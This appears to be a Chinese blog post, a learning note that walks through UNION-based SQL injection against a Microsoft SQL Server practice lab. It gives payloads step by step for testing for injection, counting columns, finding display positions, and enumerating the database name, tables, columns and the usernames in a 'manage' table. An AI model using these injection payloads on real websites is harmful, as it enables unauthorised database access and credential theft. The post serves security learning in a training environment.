学习MSSQL数据库联合注入
环境搭建
MSSQL的环境搭建还是相对复杂,这里直接使用墨者学院的MSSQL漏洞环境
注入过程
判断是否存在注入
由以下情况,基本判断为
1 | ?id=2 正常有回显 |
判断列数
由以下情况,判断列数为4
1 | ?id=2 order by 4 -- 正常有回显 |
判断显示位
同Oracle一样,MSSQL是对字段类型比较严格的要求的,可以先以null填充,然后以字符或数字替换
1 | ?id=-1 union all select 1,'2','3',4-- |
回显2,3
查询数据库
1 | ?id=-1 union all select 1,db_name(),'3',4-- |
查看表名
1 | select top 1 name from mozhe_db_v2..sysobjects where xtype='u' |
查看列名
1 | select top 1 col_name(object_id('manage'),1) from sysobjects |
查询数据
1 | select username from manage |
总结
简单走一次完整的MSSQL查询过程,稍后会学习较为完整的MSSQL攻击手法。
本文作者:
yd0ng
本文链接: https://yd0ng.github.io/2020/09/11/MSSQL%E6%B3%A8%E5%85%A5%E5%88%9D%E6%8E%A2/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!
本文链接: https://yd0ng.github.io/2020/09/11/MSSQL%E6%B3%A8%E5%85%A5%E5%88%9D%E6%8E%A2/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!